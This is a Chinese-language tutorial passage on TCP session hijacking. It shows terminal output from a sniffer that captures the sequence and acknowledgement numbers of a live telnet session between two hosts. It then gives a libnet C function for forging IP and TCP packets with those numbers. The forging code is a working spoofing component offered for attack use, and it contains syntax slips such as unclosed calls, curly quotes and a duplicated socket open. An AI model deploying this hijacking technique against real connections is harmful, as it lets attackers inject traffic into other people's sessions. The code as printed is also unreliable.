这个程序是修改来的,原理是采用pcap来抓包,并把抓到的报文进行解码,如何遇到是Ack flags的,就把包中的SEQ和ACK取得出来.
对程序进行调试并找到SEQ和ACK:
[root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
[root@chi chi]# ./get_seq_ack
get_seq_ack.c
./get_seq_ack
[root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
device = eth0
Connection form 192.168.25.1 to 192.168.25.4
wait for SEQ/ACK :
Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
source_port is 3486
dest_port is 23
[root@chi chi]#
这上面的SEQ = 0x4eb9d6ca ACK = 0x83005cc,接下来就是用它们来建立 “假的”IP和Tcp包.
======================================================================================
接下去我们要先建立你要发送的IP包, 下面是Ip protocol,我们用libnet来建立ip是很简单的;
Ip protocol :
0 4 8 16 19 24 32
------------------------------------------------------------------------
| VERS | HLEN | Service Type | Total Length |
------------------------------------------------------------------------
| Identification | Flags | Fragment Offset |
------------------------------------------------------------------------
| Source IP Address |
------------------------------------------------------------------------
| Destination IP Address |
------------------------------------------------------------------------
| IP Options | Padding |
------------------------------------------------------------------------
| Data |
------------------------------------------------------------------------
对ip packet的介绍我就不写啦, 太麻烦啦, 那我就用libnet建立个ip包和tcp包,如何你不懂的话,scz写过libnet的介绍,上面写的很清楚你要做的。
/******************************************************************************/
Written by spwny
void
sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
{
u_char *packet;
int fd, psize;
psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
libnet_init_packet(psize, &packet);
if (!packet)
libnet_error(LIBNET_ERR_FATAL, “libnet_init_packet failed\n“;
fd = libnet_open_raw_sock(IPPROTO_RAW);
if ((fd = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
libnet_error(LIBNET_ERR_FATAL, “libnet_open_raw_sock failed\n“;
libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
libnet_error(LIBNET_ERR_FATAL, “libnet_do_checksum failed\n“;
libnet_write_ip(fd, packet, psize);
libnet_close_raw_sock(fd);
libnet_destroy_packet(&packet);
}
/********************************************************************************/